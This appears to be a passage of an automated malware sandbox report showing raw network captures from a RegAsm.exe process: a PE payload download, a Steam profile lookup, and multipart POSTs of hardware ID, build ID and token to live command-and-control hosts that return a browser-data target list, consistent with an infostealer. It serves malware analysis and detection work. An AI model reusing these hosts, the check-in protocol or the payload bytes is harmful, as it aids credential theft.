                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 147.45.44.104
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Oct 3, 2024 09:16:43.416296959 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:43 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 391072
                                                                                                                                                      Last-Modified: Thu, 03 Oct 2024 03:47:30 GMT
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Keep-Alive: timeout=120
                                                                                                                                                      ETag: "66fe13d2-5f7a0"
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0c 11 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 4e bf 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 d6 8c 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 c0 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfN @ `SBx(& H.textT `.rsrcB@@.reloc@B0HPp"^ndx:8"h>Y6niUt]Omo''YqMzBj0t:Jy3R3s:\nkSNxq=_t0,hpO~3`buUp{["(.~@KK$hCbedg|;;ZV%WJ{RFbefS=X~[eB [g9%/@g+IZh2AS2C"Qkx;H{JCqdL}PGb
                                                                                                                                                      Oct 3, 2024 09:16:43.416335106 CEST1236INData Raw: ee bb 53 36 06 6f 1c 11 b9 d5 7a 80 da 7b 02 ee ae a0 5c 78 c9 1e 78 3d 38 e1 e6 ca 79 af cc 7f b2 b4 40 5a cd e2 8e e6 50 51 6d 0d 05 37 75 5c e3 49 1f c2 c7 57 ac 01 46 6f 92 71 89 82 15 06 6f 3c 7b 19 93 a4 f8 38 5c 98 85 14 d0 26 d0 5b cf d1
                                                                                                                                                      Data Ascii: S6oz{\xx=8y@ZPQm7u\IWFoqo<{8\&[Ny(Eutc yWIS*f<*"[w_cj)*A9SKkP:4iFpof]KH>n~#BAR%15L
                                                                                                                                                      Oct 3, 2024 09:16:43.416346073 CEST1236INData Raw: a7 c4 39 3f 21 64 8c a0 9d cf 25 73 a4 57 70 76 ee c2 89 37 94 7b f3 6f a9 57 76 83 fd 5e 53 1f 6b 07 a9 d9 06 df 92 48 e4 58 a9 67 70 f8 0e 2b 48 c5 1f d7 d7 4e 99 5d 1c 94 31 9a cb c9 a0 f4 ef b5 d5 92 27 45 bc 51 00 ab 38 79 6c 1b 97 02 94 26
                                                                                                                                                      Data Ascii: 9?!d%sWpv7{oWv^SkHXgp+HN]1'EQ8yl&b^>s{99{'sK#QO?5E~K-1i?Rav"!.**15Zc?${kNIB^QC)A67~.5T>FsY{4nRr6_(
                                                                                                                                                      Oct 3, 2024 09:16:43.416595936 CEST1236INData Raw: 1f 5a 3b a5 c5 37 19 7a 8e 88 95 b4 a9 94 ac b9 a2 2d 0c 4d 2c 9d 83 ba e2 f4 6f 62 e4 40 54 f8 e9 1f 56 da 8f 22 f3 e8 a4 5e f4 98 72 39 7b 07 ff a9 4e 19 88 8b c9 28 67 54 f2 5f 3c 65 5a ab b8 d6 50 22 7f 86 52 11 74 94 fd 94 ff 29 e3 af 53 2f
                                                                                                                                                      Data Ascii: Z;7z-M,ob@TV"^r9{N(gT_<eZP"Rt)S/v1/vd26/W3A#(sNomxrERmjmApx#zzu`wv$VyU66#ASvYr!yv[.+hh3t~K
                                                                                                                                                      Oct 3, 2024 09:16:43.416608095 CEST896INData Raw: 66 95 1c 87 7a d2 17 3d a7 c1 08 f4 4e 7a f9 eb 20 47 a5 a4 46 2c 12 09 5c 74 68 9a 45 e9 83 92 7b 42 8e df d4 9c 9b 3a b6 8a 4a d7 15 a7 e5 b1 43 b0 0e 46 8e 8c 9e a7 27 17 67 a6 a2 29 59 ac 83 04 c9 bc 5e 5e 81 4f f8 55 ba 18 6e 79 9a e9 53 06
                                                                                                                                                      Data Ascii: fz=Nz GF,\thE{B:JCF'g)Y^^OUnyS0't^y<? TP@vp/nG$\M0XKL X&WM"DaLo6xZEwS(>J(v0p)oar[ `
                                                                                                                                                      Oct 3, 2024 09:16:43.416619062 CEST1236INData Raw: 7c 19 39 77 9f b6 02 65 75 aa c1 73 94 6c 21 4d 53 a7 c8 b7 08 a3 c3 85 5d ae 1c e6 ed 03 fd 06 ee ee e1 64 9f 3b 27 6c 93 f8 fc 00 12 59 a0 c1 a8 37 15 e1 9b c5 11 82 ab ca 5f 35 3f 68 59 88 12 4d 49 0c d8 5d f8 f6 81 9c 9b 8f e7 15 70 bc ea 9b
                                                                                                                                                      Data Ascii: |9weusl!MS]d;'lY7_5?hYMI]p &l?Q0g>JVHBC>TK.c,NEn<0n4`:!IE2 %vhv~pp\F}kX4\<lajWtH
                                                                                                                                                      Oct 3, 2024 09:16:43.417084932 CEST1236INData Raw: 79 9a 8d ab 4e 82 63 a0 85 d5 9c eb 55 fb 68 c8 ef d7 ae 40 7b d9 51 fa cf 70 88 80 8e 48 12 43 b8 3a ff b5 7e da b2 aa ed 13 ca ef d6 08 90 ae cb f1 03 d4 5e 26 03 b9 b5 23 6c b2 22 74 3d 4f 48 51 32 f6 25 c5 e5 1b 04 29 a1 13 01 68 1e ff fd 7c
                                                                                                                                                      Data Ascii: yNcUh@{QpHC:~^&#l"t=OHQ2%)h|NpB|8Z0qn5W$iQE\(Uh\6f6uR7,.:t<8vo3'pOhD7b@Cp(;#[d#I:m5G:aT.~,A~j
                                                                                                                                                      Oct 3, 2024 09:16:43.417097092 CEST1236INData Raw: de 8f d1 6c 52 70 c8 bd 0c f6 55 4e ed 64 c0 96 5c 13 14 22 90 ba c1 1f 25 6e 66 1f 79 32 49 a1 2f 6b e6 39 59 a1 18 03 5f 3a ca 46 1b 55 70 da cf af dc 8a 9d e2 9b 1f 2d 92 c0 fd f3 bc 9b d3 59 bd 23 64 cb ca 9a ef 34 3f 62 b9 a7 01 d2 16 31 eb
                                                                                                                                                      Data Ascii: lRpUNd\"%nfy2I/k9Y_:FUp-Y#d4?b1]"1x0^D*5fo(M7vKu]YqpPq:\a:k>({](aEJY\_Gp|Z:LZ]w{:uR!r7g+sSIJKk
                                                                                                                                                      Oct 3, 2024 09:16:43.417108059 CEST1236INData Raw: 0a 3f 4d c4 af 42 e1 31 ce bb 05 62 06 5d da 1e 52 3c 5a 98 47 9c cd 79 ec cb 1f 52 f7 f9 e8 f5 54 38 75 05 e7 66 74 9f 1f 4c 97 a9 7f cf 70 20 87 e7 81 05 26 53 bb 47 4c 48 43 9d 3a 1e d9 1f 1a 1c b8 0b 5d 65 e3 1b 40 dc 08 b5 10 0a 56 e2 83 c5
                                                                                                                                                      Data Ascii: ?MB1b]R<ZGyRT8uftLp &SGLHC:]e@Vw]X2wHIKyO-i`T/l4.:\`EspjBS"QGG.<ptV7i{/WYnJlvXb/&hQCoP595}%VM
                                                                                                                                                      Oct 3, 2024 09:16:43.417119980 CEST1236INData Raw: a1 0b 0d a6 28 cf 75 40 1a 14 4c 7e 18 17 b0 6a 45 97 ce dd 44 88 f5 41 f9 a9 50 10 e3 5f 0d 97 97 7a 0a 09 cc c9 0f f2 35 85 9c 63 db 02 fc 3f d6 8a 37 49 7e 96 ca 50 8d 5d fb e3 d0 35 89 10 e3 ce 8d 92 9e 05 d4 e0 35 1b 46 75 fa ed d4 09 09 5f
                                                                                                                                                      Data Ascii: (u@L~jEDAP_z5c?7I~P]55Fu_s"u!Y'JC0?b(RF!?4rkR;ASX'Br;\YPYW&?D=VVF {QiLCr_q(wKF~!]Bu}~`6'
                                                                                                                                                      Oct 3, 2024 09:16:43.421232939 CEST1236INData Raw: 13 6f d7 83 b4 45 a8 cb 18 30 f2 09 f2 0a 00 57 4d 46 55 bf db 91 bd 4f c5 39 30 c0 63 a1 ec 8b c4 6c a3 b9 0c 3e 63 ee 74 48 ef 12 bb 7e 35 c4 9d b1 5a 67 96 0e bf b0 ce fe 0e ec 2b d9 2a 63 88 1c b0 43 c2 5e 6f f1 34 1f 1b 89 b8 c9 aa fa dd 36
                                                                                                                                                      Data Ascii: oE0WMFUO90cl>ctH~5Zg+*cC^o46Hp`|OSN;PHnp&"d#VVB{oS5kN)Q<hH33gXp#=x^w~tD !-rHt3BrT@[S+F~rC


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.64975145.132.206.251806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Oct 3, 2024 09:16:47.298543930 CEST281OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: cowod.hopto.org
                                                                                                                                                      Content-Length: 3157
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Oct 3, 2024 09:16:47.298594952 CEST3157OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36
                                                                                                                                                      Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------FCAAEBFHJJDAAK
                                                                                                                                                      Oct 3, 2024 09:16:48.158515930 CEST188INHTTP/1.1 200 OK
                                                                                                                                                      Server: openresty
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      X-Served-By: cowod.hopto.org


                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.649720104.102.49.2544436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:07 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:07 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:07 GMT
                                                                                                                                                      Content-Length: 34879
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: sessionid=349f23963855c507010ce2ac; Path=/; Secure; SameSite=None
                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                      2024-10-03 07:16:07 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                      2024-10-03 07:16:07 UTC16384INData Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34
                                                                                                                                                      Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
                                                                                                                                                      2024-10-03 07:16:07 UTC3768INData Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72
                                                                                                                                                      Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
                                                                                                                                                      2024-10-03 07:16:07 UTC213INData Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                      Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.64972149.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:09 UTC184OUTGET / HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:09 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.64972249.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:10 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 256
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:10 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 38 37 37 36 38 45 30 43 43 39 33 37 34 30 31 30 35 32 38 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 2d 2d 0d
                                                                                                                                                      Data Ascii: ------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="hwid"7487768E0CC93740105281-a33c7340-61ca------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------GCGCBAECFCAKKEBFCFII--
                                                                                                                                                      2024-10-03 07:16:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:10 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:10 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 3a1|1|1|1|039b7602cef4e610f9251887c9a84f91|1|1|1|0|0|50000|10


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.64972349.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:11 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------GCFIIEBKEGHJJJJJJDAACont
                                                                                                                                                      2024-10-03 07:16:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:12 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:12 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.64972449.12.197.94436880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-10-03 07:16:12 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
